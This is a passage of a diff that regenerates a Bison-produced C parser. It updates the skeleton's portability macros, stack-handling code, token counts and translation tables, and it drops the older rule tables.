__C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) ++# elif defined __STDC_VERSION__ && 199901 <= __STDC_VERSION__ + # include <stddef.h> /* INFRINGES ON USER NAME SPACE */ + # define YYSIZE_T size_t + # else +-# define YYSIZE_T unsigned int ++# define YYSIZE_T unsigned + # endif + #endif + +-#define YYSIZE_MAXIMUM ((YYSIZE_T) -1) ++#define YYSIZE_MAXIMUM \ ++ YY_CAST (YYPTRDIFF_T, \ ++ (YYPTRDIFF_MAXIMUM < YY_CAST (YYSIZE_T, -1) \ ++ ? YYPTRDIFF_MAXIMUM \ ++ : YY_CAST (YYSIZE_T, -1))) ++ ++#define YYSIZEOF(X) YY_CAST (YYPTRDIFF_T, sizeof (X)) ++ ++ ++/* Stored state numbers (used for stacks). */ ++typedef yytype_int16 yy_state_t; ++ ++/* State numbers in computations. */ ++typedef int yy_state_fast_t; + + #ifndef YY_ + # if defined YYENABLE_NLS && YYENABLE_NLS + # if ENABLE_NLS + # include <libintl.h> /* INFRINGES ON USER NAME SPACE */ +-# define YY_(msgid) dgettext ("bison-runtime", msgid) ++# define YY_(Msgid) dgettext ("bison-runtime", Msgid) + # endif + # endif + # ifndef YY_ +-# define YY_(msgid) msgid ++# define YY_(Msgid) Msgid ++# endif ++#endif ++ ++ ++#ifndef YY_ATTRIBUTE_PURE ++# if defined __GNUC__ && 2 < __GNUC__ + (96 <= __GNUC_MINOR__) ++# define YY_ATTRIBUTE_PURE __attribute__ ((__pure__)) ++# else ++# define YY_ATTRIBUTE_PURE ++# endif ++#endif ++ ++#ifndef YY_ATTRIBUTE_UNUSED ++# if defined __GNUC__ && 2 < __GNUC__ + (7 <= __GNUC_MINOR__) ++# define YY_ATTRIBUTE_UNUSED __attribute__ ((__unused__)) ++# else ++# define YY_ATTRIBUTE_UNUSED + # endif + #endif + + /* Suppress unused-variable warnings by "using" E. */ + #if ! defined lint || defined __GNUC__ +-# define YYUSE(e) ((void) (e)) ++# define YY_USE(E) ((void) (E)) + #else +-# define YYUSE(e) /* empty */ ++# define YY_USE(E) /* empty */ + #endif + +-/* Identity function, used to suppress warnings about constant conditions. */ +-#ifndef lint +-# define YYID(n) (n) +-#else +-#if (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) +-static int +-YYID (int i) ++/* Suppress an incorrect diagnostic about yylval being uninitialized. */ ++#if defined __GNUC__ && ! defined __ICC && 406 <= __GNUC__ * 100 + __GNUC_MINOR__ ++# if __GNUC__ * 100 + __GNUC_MINOR__ < 407 ++# define YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN \ ++ _Pragma ("GCC diagnostic push") \ ++ _Pragma ("GCC diagnostic ignored \"-Wuninitialized\"") ++# else ++# define YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN \ ++ _Pragma ("GCC diagnostic push") \ ++ _Pragma ("GCC diagnostic ignored \"-Wuninitialized\"") \ ++ _Pragma ("GCC diagnostic ignored \"-Wmaybe-uninitialized\"") ++# endif ++# define YY_IGNORE_MAYBE_UNINITIALIZED_END \ ++ _Pragma ("GCC diagnostic pop") + #else +-static int +-YYID (i) +- int i; ++# define YY_INITIAL_VALUE(Value) Value + #endif +-{ +- return i; +-} ++#ifndef YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN ++# define YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN ++# define YY_IGNORE_MAYBE_UNINITIALIZED_END ++#endif ++#ifndef YY_INITIAL_VALUE ++# define YY_INITIAL_VALUE(Value) /* Nothing. */ ++#endif ++ ++#if defined __cplusplus && defined __GNUC__ && ! defined __ICC && 6 <= __GNUC__ ++# define YY_IGNORE_USELESS_CAST_BEGIN \ ++ _Pragma ("GCC diagnostic push") \ ++ _Pragma ("GCC diagnostic ignored \"-Wuseless-cast\"") ++# define YY_IGNORE_USELESS_CAST_END \ ++ _Pragma ("GCC diagnostic pop") + #endif ++#ifndef YY_IGNORE_USELESS_CAST_BEGIN ++# define YY_IGNORE_USELESS_CAST_BEGIN ++# define YY_IGNORE_USELESS_CAST_END ++#endif ++ ++ ++#define YY_ASSERT(E) ((void) (0 && (E))) + +-#if ! defined yyoverflow || YYERROR_VERBOSE ++#if !defined yyoverflow + + /* The parser invokes alloca or malloc; define the necessary symbols. */ + +@@ -738,11 +922,11 @@ YYID (i) + # define alloca _alloca + # else + # define YYSTACK_ALLOC alloca +-# if ! defined _ALLOCA_H && ! defined _STDLIB_H && (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) ++# if ! defined _ALLOCA_H && ! defined EXIT_SUCCESS + # include <stdlib.h> /* INFRINGES ON USER NAME SPACE */ +-# ifndef _STDLIB_H +-# define _STDLIB_H 1 ++ /* Use EXIT_SUCCESS as a witness for stdlib.h. */ ++# ifndef EXIT_SUCCESS ++# define EXIT_SUCCESS 0 + # endif + # endif + # endif +@@ -750,8 +934,8 @@ YYID (i) + # endif + + # ifdef YYSTACK_ALLOC +- /* Pacify GCC's `empty if-body' warning. */ +-# define YYSTACK_FREE(Ptr) do { /* empty */; } while (YYID (0)) ++ /* Pacify GCC's 'empty if-body' warning. */ ++# define YYSTACK_FREE(Ptr) do { /* empty */; } while (0) + # ifndef YYSTACK_ALLOC_MAXIMUM + /* The OS might guarantee only one guard page at the bottom of the stack, + and a page size can be as small as 4096 bytes. So we cannot safely +@@ -765,125 +949,131 @@ YYID (i) + # ifndef YYSTACK_ALLOC_MAXIMUM + # define YYSTACK_ALLOC_MAXIMUM YYSIZE_MAXIMUM + # endif +-# if (defined __cplusplus && ! defined _STDLIB_H \ ++# if (defined __cplusplus && ! defined EXIT_SUCCESS \ + && ! ((defined YYMALLOC || defined malloc) \ +- && (defined YYFREE || defined free))) ++ && (defined YYFREE || defined free))) + # include <stdlib.h> /* INFRINGES ON USER NAME SPACE */ +-# ifndef _STDLIB_H +-# define _STDLIB_H 1 ++# ifndef EXIT_SUCCESS ++# define EXIT_SUCCESS 0 + # endif + # endif + # ifndef YYMALLOC + # define YYMALLOC malloc +-# if ! defined malloc && ! defined _STDLIB_H && (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) ++# if ! defined malloc && ! defined EXIT_SUCCESS + void *malloc (YYSIZE_T); /* INFRINGES ON USER NAME SPACE */ + # endif + # endif + # ifndef YYFREE + # define YYFREE free +-# if ! defined free && ! defined _STDLIB_H && (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) ++# if ! defined free && ! defined EXIT_SUCCESS + void free (void *); /* INFRINGES ON USER NAME SPACE */ + # endif + # endif + # endif +-#endif /* ! defined yyoverflow || YYERROR_VERBOSE */ +- ++#endif /* !defined yyoverflow */ + + #if (! defined yyoverflow \ + && (! defined __cplusplus \ +- || (defined YYSTYPE_IS_TRIVIAL && YYSTYPE_IS_TRIVIAL))) ++ || (defined YYSTYPE_IS_TRIVIAL && YYSTYPE_IS_TRIVIAL))) + + /* A type that is properly aligned for any stack member. */ + union yyalloc + { +- yytype_int16 yyss; +- YYSTYPE yyvs; +- }; ++ yy_state_t yyss_alloc; ++ YYSTYPE yyvs_alloc; ++}; + + /* The size of the maximum gap between one aligned stack and the next. */ +-# define YYSTACK_GAP_MAXIMUM (sizeof (union yyalloc) - 1) ++# define YYSTACK_GAP_MAXIMUM (YYSIZEOF (union yyalloc) - 1) + + /* The size of an array large to enough to hold all stacks, each with + N elements. */ + # define YYSTACK_BYTES(N) \ +- ((N) * (sizeof (yytype_int16) + sizeof (YYSTYPE)) \ ++ ((N) * (YYSIZEOF (yy_state_t) + YYSIZEOF (YYSTYPE)) \ + + YYSTACK_GAP_MAXIMUM) + +-/* Copy COUNT objects from FROM to TO. The source and destination do +- not overlap. */ +-# ifndef YYCOPY +-# if defined __GNUC__ && 1 < __GNUC__ +-# define YYCOPY(To, From, Count) \ +- __builtin_memcpy (To, From, (Count) * sizeof (*(From))) +-# else +-# define YYCOPY(To, From, Count) \ +- do \ +- { \ +- YYSIZE_T yyi; \ +- for (yyi = 0; yyi < (Count); yyi++) \ +- (To)[yyi] = (From)[yyi]; \ +- } \ +- while (YYID (0)) +-# endif +-# endif ++# define YYCOPY_NEEDED 1 + + /* Relocate STACK from its old location to the new one. The + local variables YYSIZE and YYSTACKSIZE give the old and new number of + elements in the stack, and YYPTR gives the new location of the + stack. Advance YYPTR to a properly aligned location for the next + stack. */ +-# define YYSTACK_RELOCATE(Stack) \ +- do \ +- { \ +- YYSIZE_T yynewbytes; \ +- YYCOPY (&yyptr->Stack, Stack, yysize); \ +- Stack = &yyptr->Stack; \ +- yynewbytes = yystacksize * sizeof (*Stack) + YYSTACK_GAP_MAXIMUM; \ +- yyptr += yynewbytes / sizeof (*yyptr); \ +- } \ +- while (YYID (0)) ++# define YYSTACK_RELOCATE(Stack_alloc, Stack) \ ++ do \ ++ { \ ++ YYPTRDIFF_T yynewbytes; \ ++ YYCOPY (&yyptr->Stack_alloc, Stack, yysize); \ ++ Stack = &yyptr->Stack_alloc; \ ++ yynewbytes = yystacksize * YYSIZEOF (*Stack) + YYSTACK_GAP_MAXIMUM; \ ++ yyptr += yynewbytes / YYSIZEOF (*yyptr); \ ++ } \ ++ while (0) + + #endif + ++#if defined YYCOPY_NEEDED && YYCOPY_NEEDED ++/* Copy COUNT objects from SRC to DST. The source and destination do ++ not overlap. */ ++# ifndef YYCOPY ++# if defined __GNUC__ && 1 < __GNUC__ ++# define YYCOPY(Dst, Src, Count) \ ++ __builtin_memcpy (Dst, Src, YY_CAST (YYSIZE_T, (Count)) * sizeof (*(Src))) ++# else ++# define YYCOPY(Dst, Src, Count) \ ++ do \ ++ { \ ++ YYPTRDIFF_T yyi; \ ++ for (yyi = 0; yyi < (Count); yyi++) \ ++ (Dst)[yyi] = (Src)[yyi]; \ ++ } \ ++ while (0) ++# endif ++# endif ++#endif /* !YYCOPY_NEEDED */ ++ + /* YYFINAL -- State number of the termination state. */ + #define YYFINAL 4 + /* YYLAST -- Last index in YYTABLE. */ +-#define YYLAST 1630 ++#define YYLAST 1669 + + /* YYNTOKENS -- Number of terminals. */ +-#define YYNTOKENS 174 ++#define YYNTOKENS 175 + /* YYNNTS -- Number of nonterminals. */ + #define YYNNTS 255 + /* YYNRULES -- Number of rules. */ +-#define YYNRULES 597 +-/* YYNRULES -- Number of states. */ +-#define YYNSTATES 1047 +- +-/* YYTRANSLATE(YYLEX) -- Bison symbol number corresponding to YYLEX. */ +-#define YYUNDEFTOK 2 +-#define YYMAXUTOK 406 +- +-#define YYTRANSLATE(YYX) \ +- ((unsigned int) (YYX) <= YYMAXUTOK ? yytranslate[YYX] : YYUNDEFTOK) ++#define YYNRULES 598 ++/* YYNSTATES -- Number of states. */ ++#define YYNSTATES 1050 ++ ++/* YYMAXUTOK -- Last valid token kind. */ ++#define YYMAXUTOK 407 ++ ++ ++/* YYTRANSLATE(TOKEN-NUM) -- Symbol number corresponding to TOKEN-NUM ++ as returned by yylex, with out-of-bounds checking. */ ++#define YYTRANSLATE(YYX) \ ++ (0 <= (YYX) && (YYX) <= YYMAXUTOK \ ++ ? YY_CAST (yysymbol_kind_t, yytranslate[YYX]) \ ++ : YYSYMBOL_YYUNDEF) + +-/* YYTRANSLATE[YYLEX] -- Bison symbol number corresponding to YYLEX. */ ++/* YYTRANSLATE[TOKEN-NUM] -- Symbol number corresponding to TOKEN-NUM ++ as returned by yylex. */ + static const yytype_uint8 yytranslate[] = + { + 0, 2, 2, 2, 2, 2, 2, 2, 2, 2, + 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, + 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, +- 2, 2, 2, 159, 2, 2, 2, 172, 164, 2, +- 152, 153, 162, 161, 154, 160, 2, 163, 2, 2, +- 2, 2, 2, 2, 2, 2, 2, 2, 169, 158, +- 167, 155, 168, 2, 2, 2, 2, 2, 2, 2, ++ 2, 2, 2, 160, 2, 2, 2, 173, 165, 2, ++ 153, 154, 163, 162, 155, 161, 2, 164, 2, 2, ++ 2, 2, 2, 2, 2, 2, 2, 2, 170, 159, ++ 168, 156, 169, 2, 2, 2, 2, 2, 2, 2, + 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, + 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, +- 2, 170, 2, 171, 173, 2, 2, 2, 2, 2, ++ 2, 171, 2, 172, 174, 2, 2, 2, 2, 2, + 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, + 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, +- 2, 2, 2, 156, 165, 157, 166, 2, 2, 2, ++ 2, 2, 2, 157, 166, 158, 167, 2, 2, 2, + 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, + 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, + 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, +@@ -911,334 +1101,97 @@ static const yytype_uint8 yytranslate[] + 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, + 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, + 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, +- 145, 146, 147, 148, 149, 150, 151 ++ 145, 146, 147, 148, 149, 150, 151, 152 + }; + + #if YYDEBUG +-/* YYPRHS[YYN] -- Index of the first RHS symbol of rule number YYN in +- YYRHS. */ +-static const yytype_uint16 yyprhs[] = +-{ +- 0, 0, 3, 5, 8, 9, 12, 14, 16, 18, +- 20, 22, 24, 26, 28, 30, 32, 34, 36, 38, +- 40, 42, 44, 46, 48, 50, 52, 54, 56, 58, +- 60, 62, 64, 66, 68, 70, 72, 74, 76, 78, +- 80, 82, 84, 86, 88, 90, 92, 94, 96, 98, +- 100, 102, 104, 106, 108, 110, 112, 115, 117, 121, +- 123, 127, 131, 134, 136, 140, 142, 146, 150, 153, +- 155, 159, 161, 165, 169, 172, 174, 178, 180, 184, +- 188, 192, 194, 198, 200, 204, 208, 211, 214, 218, +- 220, 224, 228, 232, 238, 239, 243, 248, 250, 253, +- 255, 257, 259, 261, 264, 265, 271, 272, 279, 284, +- 286, 289, 291, 293, 295, 297, 300, 303, 305, 307, +- 309, 324, 325, 331, 332, 336, 338, 341, 342, 348, +- 350, 353, 355, 358, 360, 364, 366, 370, 374, 375, +- 381, 383, 386, 388, 389, 395, 397, 400, 404, 409, +- 411, 415, 417, 421, 422, 424, 428, 430, 434, 438, +- 442, 446, 450, 453, 455, 459, 461, 465, 469, 472, +- 474, 478, 480, 484, 488, 491, 493, 497, 499, 503, +- 507, 511, 513, 517, 519, 523, 527, 528, 533, 535, +- 538, 540, 542, 544, 548, 550, 554, 556, 560, 564, +- 565, 570, 572, 575, 577, 579, 581, 585, 589, 590, +- 594, 598, 600, 604, 608, 612, 616, 620, 624, 628, +- 632, 636, 640, 641, 646, 648, 651, 653, 655, 657, +- 659, 661, 663, 664, 666, 669, 671, 675, 677, 681, +- 685, 689, 692, 695, 697, 701, 703, 707, 711, 712, +- 715, 716, 719, 720, 723, 726, 729, 732, 735, 738, +- 741, 744, 747, 750, 753, 756, 759, 762, 765, 768, +- 771, 774, 777, 780, 783, 786, 789, 792, 795, 798, +- 801, 804, 807, 810, 814, 816, 820, 824, 828, 829, +- 831, 835, 837, 841, 845, 849, 850, 852, 856, 858, +- 862, 864, 868, 872, 876, 881, 884, 886, 889, 890, +- 900, 901, 903, 905, 906, 908, 909, 911, 912, 914, +- 916, 919, 921, 923, 928, 929, 931, 932, 935, 936, +- 939, 941, 945, 947, 949, 951, 953, 955, 957, 958, +- 960, 962, 964, 966, 968, 970, 974, 975, 979, 982, +- 984, 986, 990, 992, 994, 996, 998, 1003, 1006, 1008, +- 1010, 1012, 1014, 1016, 1018, 1019, 1021, 1025, 1032, 1045, +- 1046, 1047, 1056, 1057, 1061, 1066, 1067, 1068, 1077, 1078, +- 1081, 1083, 1087, 1090, 1091, 1093, 1095, 1097, 1098, 1102, +- 1103, 1105, 1108, 1110, 1112, 1114, 1116, 1118, 1120, 1122, +- 1124, 1126, 1128, 1130, 1132, 1134, 1136, 1138, 1140, 1142, +- 1144, 1146, 1148, 1150, 1152, 1154, 1156, 1158, 1160, 1162, +- 1164, 1167, 1170, 1173, 1177, 1181, 1185, 1188, 1192, 1196, +- 1198, 1202, 1206, 1210, 1214, 1215, 1220, 1222, 1225, 1227, +- 1229, 1231, 1233, 1235, 1236, 1238, 1239, 1243, 1245, 1257, +- 1258, 1262, 1264, 1276, 1277, 1278, 1285, 1286, 1287, 1295, +- 1313, 1321, 1339, 1356, 1358, 1360, 1362, 1364, 1366, 1368, +- 1370, 1372, 1375, 1378, 1381, 1384, 1387, 1390, 1393, 1396, +- 1399, 1402, 1406, 1410, 1412, 1415, 1418, 1420, 1423, 1426, +- 1429, 1431, 1434, 1435, 1437, 1438, 1440, 1441, 1444, 1445, +- 1449, 1451, 1455, 1457, 1461, 1463, 1469, 1471, 1473, 1474, +- 1477, 1478, 1481, 1482, 1485, 1486, 1489, 1491, 1492, 1494, +- 1498, 1503, 1508, 1513, 1517, 1521, 1528, 1535, 1539, 1542, +- 1543, 1547, 1548, 1552, 1554, 1555, 1559, 1561, 1563, 1565, +- 1566, 1570, 1572, 1581, 1582, 1586, 1588, 1591, 1593, 1595, +- 1598, 1601, 1604, 1609, 1613, 1617, 1618, 1620, 1621, 1625, +- 1628, 1630, 1635, 1638, 1641, 1643, 1645, 1648, 1650, 1652, +- 1655, 1658, 1662, 1664, 1666, 1668, 1671, 1674, 1676, 1678, +- 1680, 1682, 1684, 1686, 1688, 1690, 1692, 1694, 1696, 1698, +- 1700, 1702, 1704, 1708, 1709, 1714, 1715, 1717 +-}; +- +-/* YYRHS -- A `-1'-separated list of the rules' RHS. */ +-static const yytype_int16 yyrhs[] = +-{ +- 175, 0, -1, 176, -1, 175, 176, -1, -1, 177, +- 178, -1, 269, -1, 255, -1, 262, -1, 192, -1, +- 291, -1, 279, -1, 283, -1, 284, -1, 200, -1, +- 230, -1, 222, -1, 226, -1, 239, -1, 180, -1, +- 184, -1, 188, -1, 243, -1, 247, -1, 251, -1, +- 292, -1, 293, -1, 306, -1, 308, -1, 309, -1, +- 310, -1, 311, -1, 312, -1, 313, -1, 314, -1, +- 315, -1, 317, -1, 318, -1, 328, -1, 332, -1, +- 210, -1, 212, -1, 196, -1, 179, -1, 234, -1, +- 238, -1, 218, -1, 358, -1, 364, -1, 361, -1, +- 204, -1, 357, -1, 335, -1, 393, -1, 417, -1, +- 294, -1, 5, 181, -1, 36, -1, 152, 182, 153, +- -1, 183, -1, 182, 154, 183, -1, 138, 155, 36, +- -1, 6, 185, -1, 36, -1, 152, 186, 153, -1, +- 187, -1, 186, 154, 187, -1, 138, 155, 36, -1, +- 7, 189, -1, 36, -1, 152, 190, 153, -1, 191, +- -1, 190, 154, 191, -1, 138, 155, 36, -1, 8, +- 193, -1, 34, -1, 152, 194, 153, -1, 195, -1, +- 194, 154, 195, -1, 138, 155, 34, -1, 9, 197, +- 333, -1, 34, -1, 152, 198, 153, -1, 199, -1, +- 198, 154, 199, -1, 138, 155, 34, -1, 3, 201, +- -1, 34, 107, -1, 152, 202, 153, -1, 203, -1, +- 202, 154, 203, -1, 138, 155, 381, -1, 151, 155, +- 107, -1, 122, 351, 205, 398, 206, -1, -1, 152, +- 351, 153, -1, 156, 207, 157, 158, -1, 208, -1, +- 207, 208, -1, 234, -1, 238, -1, 209, -1, 294, +- -1, 123, 333, -1, -1, 30, 425, 398, 211, 214, +- -1, -1, 363, 30, 425, 398, 213, 214, -1, 156, +- 215, 157, 158, -1, 216, -1, 215, 216, -1, 234, +- -1, 238, -1, 294, -1, 307, -1, 51, 333, -1, +- 52, 333, -1, 303, -1, 335, -1, 217, -1, 97, +- 421, 34, 152, 406, 153, 395, 427, 398, 391, 158, +- 327, 404, 403, -1, -1, 110, 34, 219, 220, 158, +- -1, -1, 156, 221, 157, -1, 179, -1, 221, 179, +- -1, -1, 112, 223, 156, 224, 157, -1, 225, -1, +- 224, 225, -1, 34, -1, 113, 227, -1, 34, -1, +- 152, 228, 153, -1, 229, -1, 228, 154, 229, -1, +- 138, 155, 381, -1, -1, 111, 231, 156, 232, 157, +- -1, 233, -1, 232, 233, -1, 34, -1, -1, 32, +- 152, 235, 237, 153, -1, 34, -1, 159, 34, -1, +- 236, 95, 34, -1, 236, 95, 159, 34, -1, 236, +- -1, 339, 160, 339, -1, 33, -1, 114, 240, 398, +- -1, -1, 36, -1, 152, 241, 153, -1, 242, -1, +- 241, 154, 242, -1, 145, 155, 36, -1, 137, 155, +- 36, -1, 143, 155, 36, -1, 144, 155, 36, -1, +- 128, 244, -1, 277, -1, 152, 245, 153, -1, 246, +- -1, 245, 154, 246, -1, 138, 155, 277, -1, 129, +- 248, -1, 277, -1, 152, 249, 153, -1, 250, -1, +- 249, 154, 250, -1, 138, 155, 277, -1, 131, 252, +- -1, 351, -1, 152, 253, 153, -1, 254, -1, 253, +- 154, 254, -1, 138, 155, 351, -1, 62, 256, 259, +- -1, 277, -1, 152, 257, 153, -1, 258, -1, 257, +- 154, 258, -1, 138, 155, 277, -1, -1, 156, 260, +- 157, 158, -1, 261, -1, 260, 261, -1, 234, -1, +- 238, -1, 323, -1, 63, 263, 266, -1, 277, -1, +- 152, 264, 153, -1, 265, -1, 264, 154, 265, -1, +- 138, 155, 277, -1, -1, 156, 267, 157, 158, -1, +- 268, -1, 267, 268, -1, 234, -1, 238, -1, 323, +- -1, 60, 270, 274, -1, 61, 277, 278, -1, -1, +- 277, 271, 278, -1, 152, 272, 153, -1, 273, -1, +- 272, 154, 273, -1, 135, 155, 36, -1, 136, 155, +- 36, -1, 138, 155, 277, -1, 146, 155, 354, -1, +- 147, 155, 354, -1, 148, 155, 354, -1, 149, 155, +- 354, -1, 150, 155, 34, -1, 151, 155, 107, -1, +- -1, 156, 275, 157, 158, -1, 276, -1, 275, 276, +- -1, 234, -1, 238, -1, 319, -1, 323, -1, 34, +- -1, 35, -1, -1, 107, -1, 54, 280, -1, 35, +- -1, 152, 281, 153, -1, 282, -1, 281, 154, 282, +- -1, 138, 155, 35, -1, 139, 155, 354, -1, 55, +- 35, -1, 56, 285, -1, 35, -1, 152, 286, 153, +- -1, 287, -1, 286, 154, 287, -1, 138, 155, 35, +- -1, -1, 17, 333, -1, -1, 18, 333, -1, -1, +- 19, 333, -1, 29, 333, -1, 57, 333, -1, 58, +- 333, -1, 59, 333, -1, 38, 333, -1, 39, 333, +- -1, 40, 333, -1, 41, 333, -1, 42, 333, -1, +- 43, 333, -1, 44, 333, -1, 45, 333, -1, 50, +- 333, -1, 46, 333, -1, 23, 333, -1, 26, 333, +- -1, 27, 333, -1, 20, 333, -1, 21, 333, -1, +- 22, 333, -1, 24, 333, -1, 25, 333, -1, 28, +- 333, -1, 10, 333, -1, 11, 333, -1, 11, 333, +- -1, 13, 333, -1, 14, 333, -1, 4, 320, -1, +- 152, 321, 153, -1, 322, -1, 321, 154, 322, -1, +- 141, 155, 36, -1, 12, 324, 333, -1, -1, 36, +- -1, 152, 325, 153, -1, 326, -1, 325, 154, 326, +- -1, 132, 155, 36, -1, 143, 155, 36, -1, -1, +- 323, -1, 15, 329, 333, -1, 34, -1, 152, 330, +- 153, -1, 331, -1, 330, 154, 331, -1, 134, 155, +- 34, -1, 140, 155, 107, -1, 16, 35, 338, 333, +- -1, 334, 33, -1, 31, -1, 334, 31, -1, -1, +- 91, 337, 339, 398, 336, 156, 340, 157, 158, -1, +- -1, 64, -1, 65, -1, -1, 35, -1, -1, 34, +- -1, -1, 341, -1, 342, -1, 341, 342, -1, 234, +- -1, 238, -1, 34, 344, 398, 343, -1, -1, 154, +- -1, -1, 155, 349, -1, -1, 155, 346, -1, 349, +- -1, 346, 347, 349, -1, 160, -1, 161, -1, 162, +- -1, 163, -1, 164, -1, 165, -1, -1, 159, -1, +- 166, -1, 160, -1, 161, -1, 162, -1, 164, -1, +- 350, 348, 355, -1, -1, 152, 351, 153, -1, 94, +- 352, -1, 352, -1, 353, -1, 352, 94, 353, -1, +- 34, -1, 116, -1, 117, -1, 351, -1, 425, 152, +- 356, 153, -1, 156, 157, -1, 108, -1, 107, -1, +- 354, -1, 118, -1, 36, -1, 115, -1, -1, 346, +- -1, 356, 154, 346, -1, 109, 421, 34, 398, 158, +- 327, -1, 109, 421, 152, 162, 34, 153, 152, 426, +- 153, 398, 158, 327, -1, -1, -1, 65, 351, 359, +- 367, 398, 360, 371, 158, -1, -1, 363, 362, 364, +- -1, 125, 167, 426, 168, -1, -1, -1, 64, 351, +- 365, 367, 398, 366, 371, 158, -1, -1, 169, 368, +- -1, 369, -1, 368, 154, 369, -1, 370, 351, -1, +- -1, 66, -1, 67, -1, 68, -1, -1, 156, 372, +- 157, -1, -1, 373, -1, 372, 373, -1, 234, -1, +- 238, -1, 218, -1, 358, -1, 364, -1, 361, -1, +- 204, -1, 357, -1, 335, -1, 374, -1, 323, -1, +- 307, -1, 294, -1, 295, -1, 296, -1, 297, -1, +- 298, -1, 299, -1, 300, -1, 301, -1, 302, -1, +- 303, -1, 304, -1, 305, -1, 316, -1, 386, -1, +- 383, -1, 409, -1, 53, 333, -1, 52, 333, -1, +- 51, 333, -1, 66, 382, 169, -1, 67, 382, 169, +- -1, 68, 382, 169, -1, 69, 169, -1, 130, 375, +- 378, -1, 152, 376, 153, -1, 377, -1, 376, 154, +- 377, -1, 133, 155, 34, -1, 138, 155, 381, -1, +- 142, 155, 34, -1, -1, 156, 379, 157, 158, -1, +- 380, -1, 379, 380, -1, 234, -1, 238, -1, 323, +- -1, 34, -1, 36, -1, -1, 71, -1, -1, 90, +- 384, 385, -1, 385, -1, 166, 34, 152, 153, 427, +- 397, 398, 158, 404, 403, 405, -1, -1, 124, 387, +- 388, -1, 388, -1, 34, 152, 406, 153, 427, 398, +- 389, 158, 327, 404, 403, -1, -1, -1, 170, 390, +- 152, 406, 153, 171, -1, -1, -1, 170, 392, 421, +- 152, 406, 153, 171, -1, 421, 34, 152, 406, 153, +- 395, 396, 427, 397, 398, 391, 158, 327, 404, 403, +- 405, 402, -1, 421, 119, 155, 152, 421, 153, 158, +- -1, 421, 119, 394, 152, 406, 153, 395, 396, 427, +- 397, 398, 391, 158, 404, 403, 405, 402, -1, 119, +- 421, 152, 406, 153, 395, 396, 427, 397, 398, 391, +- 158, 404, 403, 405, 402, -1, 161, -1, 160, -1, +- 162, -1, 163, -1, 172, -1, 164, -1, 165, -1, +- 173, -1, 167, 167, -1, 168, 168, -1, 161, 155, +- -1, 160, 155, -1, 162, 155, -1, 163, 155, -1, +- 172, 155, -1, 164, 155, -1, 165, 155, -1, 173, +- 155, -1, 167, 167, 155, -1, 168, 168, 155, -1, +- 166, -1, 152, 153, -1, 170, 171, -1, 167, -1, +- 167, 155, -1, 155, 155, -1, 159, 155, -1, 168, +- -1, 168, 155, -1, -1, 96, -1, -1, 126, -1, +- -1, 155, 107, -1, -1, 163, 399, 163, -1, 400, +- -1, 399, 154, 400, -1, 34, -1, 34, 155, 401, +- -1, 277, -1, 34, 169, 278, 160, 278, -1, 36, +- -1, 107, -1, -1, 47, 333, -1, -1, 48, 333, +- -1, -1, 49, 333, -1, -1, 37, 333, -1, 407, +- -1, -1, 408, -1, 407, 154, 408, -1, 98, 339, +- 398, 345, -1, 99, 339, 398, 345, -1, 100, 339, +- 398, 345, -1, 101, 339, 398, -1, 102, 339, 398, +- -1, 103, 152, 406, 153, 339, 398, -1, 104, 152, +- 406, 153, 339, 398, -1, 121, 339, 398, -1, 422, +- 345, -1, -1, 70, 410, 412, -1, -1, 72, 411, +- 412, -1, 412, -1, -1, 97, 413, 414, -1, 414, +- -1, 415, -1, 417, -1, -1, 90, 416, 393, -1, +- 393, -1, 421, 34, 398, 418, 158, 288, 289, 290, +- -1, -1, 156, 419, 157, -1, 420, -1, 419, 420, +- -1, 234, -1, 238, -1, 17, 333, -1, 18, 333, +- -1, 19, 333, -1, 96, 425, 424, 423, -1, 425, +- 424, 423, -1, 421, 339, 398, -1, -1, 164, -1, +- -1, 424, 162, 96, -1, 424, 162, -1, 351, -1, +- 351, 167, 426, 168, -1, 65, 351, -1, 93, 74, +- -1, 74, -1, 93, -1, 93, 75, -1, 75, -1, +- 76, -1, 93, 76, -1, 76, 76, -1, 93, 76, +- 76, -1, 77, -1, 78, -1, 73, -1, 92, 79, +- -1, 93, 79, -1, 79, -1, 80, -1, 81, -1, +- 82, -1, 83, -1, 84, -1, 85, -1, 86, -1, +- 87, -1, 88, -1, 89, -1, 105, -1, 106, -1, +- 127, -1, 421, -1, 426, 154, 421, -1, -1, 120, +- 152, 428, 153, -1, -1, 351, -1, 428, 154, 351, +- -1 +-}; +- +-/* YYRLINE[YYN] -- source line where rule number YYN was defined. */ +-static const yytype_uint16 yyrline[] = ++/* YYRLINE[YYN] -- Source line where rule number YYN was defined. */ ++static const yytype_int16 yyrline[] = + { +- 0, 574, 574, 575, 578, 578, 597, 598, 599, 600, +- 601, 602, 603, 604, 605, 606, 607, 608, 609, 610, +- 611, 612, 613, 614, 615, 616, 617, 618, 619, 620, +- 621, 622, 623, 624, 625, 626, 627, 628, 629, 630, +- 631, 632, 633, 634, 637, 638, 639, 640, 641, 642, +- 643, 644, 645, 646, 647, 648, 661, 667, 672, 677, +- 678, 688, 695, 701, 706, 711, 712, 722, 729, 738, +- 743, 748, 749, 759, 766, 777, 782, 787, 788, 798, +- 805, 834, 839, 844, 845, 855, 862, 888, 896, 901, +- 902, 913, 919, 927, 974, 978, 1085, 1090, 1091, 1102, +- 1105, 1108, 1122, 1138, 1143, 1143, 1166, 1166, 1233, 1247, +- 1248, 1251, 1252, 1253, 1257, 1261, 1270, 1279, 1288, 